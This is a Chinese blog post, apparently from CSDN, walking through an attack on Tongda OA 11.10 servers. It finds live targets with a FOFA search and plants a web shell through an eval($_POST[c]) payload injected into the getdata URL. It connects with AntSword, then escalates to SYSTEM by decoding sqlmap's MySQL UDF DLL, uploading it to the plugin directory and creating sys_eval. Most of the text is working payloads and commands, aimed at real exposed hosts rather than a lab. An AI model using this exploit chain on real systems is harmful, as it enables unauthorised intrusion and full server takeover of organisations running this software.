oa 11.10 未授权任意文件上传及提权

文章讲述了如何通过fofa搜索引擎找到特定标题的通达OA系统,之后利用URL后门进行一系列操作,包括蚁剑链接的使用来尝试提权。作者提到了通过SqlMap工具解密udf.dll文件并上传到MySQL插件目录以创建自定义函数,从而尝试获取系统权限的过程。
摘要由CSDN通过智能技术生成

一、fofa 搜索 title=“通达OA 网络智能办公系统”
在这里插入图片描述
二、打开首页任意一个
在这里插入图片描述
三、url后加如下字符例如

http://ip:port/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage

在这里插入图片描述

四、蚁剑链接
![在这里插入图片描述](https://img-blog.csdnimg.cn/d0ba40674b34498cb152eae8180bc0ac.png
五、提权
通过蚁剑执行命令,发现失败
在这里插入图片描述
在这里插入图片描述
找到数据库账号密码并登录

常用命令

select user();  # 获取数据库用户
select @@basedir;   # 获取数据库安装目录
show variables like ‘%plugin%’; # 查看plugin路径。

在这里插入图片描述

SqlMap 中集成了对应的提权文件,不过需要先进行解密操作
udf.dll的是经过编码运算的,所以需要有一个解密脚本,在这个路径下
sqlmap-master\extra\cloak
执行解码操作

python2 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

然后将解码好的文件上传到 mysql/lib/plugin/ 路径下

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
select sys_eval("whoami");

在这里插入图片描述
拿到system权限,教程到此结束,不懂得私聊我

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值